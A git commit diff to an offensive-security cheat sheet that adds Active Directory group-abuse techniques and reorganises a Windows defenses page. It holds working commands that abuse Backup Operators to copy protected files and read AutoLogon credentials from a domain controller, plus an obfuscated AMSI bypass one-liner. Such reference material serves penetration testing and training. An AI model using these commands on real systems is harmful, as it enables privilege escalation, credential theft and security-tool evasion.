AD Groups + PowerShell Defenses

michje · Feb 14, 2023 · 36e1357 · 36e1357
1 parent f1a85f2
commit 36e1357
Show file tree

Hide file tree

Showing 2 changed files with 85 additions and 17 deletions.
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
@@ -92,8 +92,11 @@
       - [ADFS - Golden SAML](#adfs---golden-saml)
     - [UnPAC The Hash](#unpac-the-hash)
     - [Shadow Credentials](#shadow-credentials)
-    - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
-    - [Abusing DNS Admins Group](#abusing-dns-admins-group)
+    - [Active Directory Groups](#active-directory-groups)
+      - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
+      - [Abusing DNS Admins Group](#abusing-dns-admins-group)
+      - [Abusing Schema Admins Group](#abusing-schema-admins-group)
+      - [Abusing Backup Operators Group](#abusing-backup-operators-group)
     - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
       - [GenericAll](#genericall)
       - [GenericWrite](#genericwrite)
@@ -2854,6 +2857,7 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi
   proxychains python3 wmiexec.py -k -no-pass ez.lab/[email protected]
   ```
 
+## Active Directory Groups 
 
 ### Dangerous Built-in Groups Usage
 
@@ -2927,6 +2931,42 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
     sc \\dc01 start dns
     ```
 
+### Abusing Schema Admins Group
+
+> The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory.
+
+
+### Abusing Backup Operators Group
+
+> Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.
+
+This groups grants the following privileges :
+- SeBackup privileges
+- SeRestore privileges
+
+* Get members of the group:
+  ```ps1
+  PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse
+  ```
+* Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege)
+  ```ps1
+  Import-Module .\SeBackupPrivilegeUtils.dll
+  Import-Module .\SeBackupPrivilegeCmdLets.dll
+
+  Set-SeBackupPrivilege
+  Get-SeBackupPrivilege
+  ```
+* Retrieve sensitive files
+  ```ps1
+  Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
+  ```
+* Retrieve content of AutoLogon in the HKLM\SOFTWARE hive
+  ```ps1
+  $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64)
+  $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
+  $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
+  ```
+
 
 ### Abusing Active Directory ACLs/ACEs
 
@@ -4191,4 +4231,5 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
 * [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)
 * [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf)
 * [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/)
-* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
+* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867)
+* [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/)
diff --git a/Methodology and Resources/Windows - Defenses.md b/Methodology and Resources/Windows - Defenses.md
@@ -2,26 +2,17 @@
 
 ## Summary
 
-* [AMSI](#amsi)
 * [AppLocker](#applocker)
 * [DPAPI](#dpapi)
 * [Powershell](#powershell)
-    * [JEA](#jea)
+    * [Anti Malware Scan Interface](#anti-malware-scan-interface)
+    * [Just Enough Administration](#just-enough-administration)
     * [Contrained Language Mode](#constrained-language-mode)
+    * [Script Block Logging](#script-block-logging)
 * [Windows Defender Antivirus](#windows-defender-antivirus)
 * [Windows Defender Application Control](#windows-defender-application-control)
 * [Windows Defender Firewall](#windows-defender-firewall)
 
-## AMSI
-
-> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content.
-
-Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
-
-```powershell
-PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
-```
-
 
 ## AppLocker
 
@@ -48,7 +39,18 @@ Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrep
 
 ## Powershell
 
-### JEA
+### Anti Malware Scan Interface
+
+> The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content.
+
+Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
+
+```powershell
+PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
+```
+
+
+### Just Enough Administration
 
 > Just-Enough-Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information.
 
@@ -62,6 +64,7 @@ Breaking out if JEA:
     Add-Computer
     ```
 
+
 ### Constrained Language Mode
 
 Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
@@ -110,6 +113,29 @@ Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageM
     ```
 
 
+### Script Block Logging
+
+> Once Script Block Logging is enabled, the script blocks and commands that are executed will be recorded in the Windows event log under the "Windows PowerShell" channel. To view the logs, administrators can use the Event Viewer application and navigate to the "Windows PowerShell" channel.
+
+Enable Script Block Loggin:
+
+```ps1
+function Enable-PSScriptBlockLogging
+{
+    $basePath = 'HKLM:\Software\Policies\Microsoft\Windows' +
+      '\PowerShell\ScriptBlockLogging'
+
+    if(-not (Test-Path $basePath))
+    {
+        $null = New-Item $basePath -Force
+    }
+
+    Set-ItemProperty $basePath -Name EnableScriptBlockLogging -Value "1"
+}
+```
+
+
+
 ## Windows Defender Antivirus
 
 Also known as `Microsoft Defender`.
@@ -186,4 +212,5 @@ Also known as `WDAC/UMCI/Device Guard`.
 
 ## References
 
-* [SNEAKING PAST DEVICE GUARD - Cybereason - Philip Tsukerman](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf)
+* [SNEAKING PAST DEVICE GUARD - Cybereason - Philip Tsukerman](https://troopers.de/downloads/troopers19/TROOPERS19_AR_Sneaking_Past_Device_Guard.pdf)
+* [PowerShell about_Logging_Windows - Microsoft Documentation](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.3)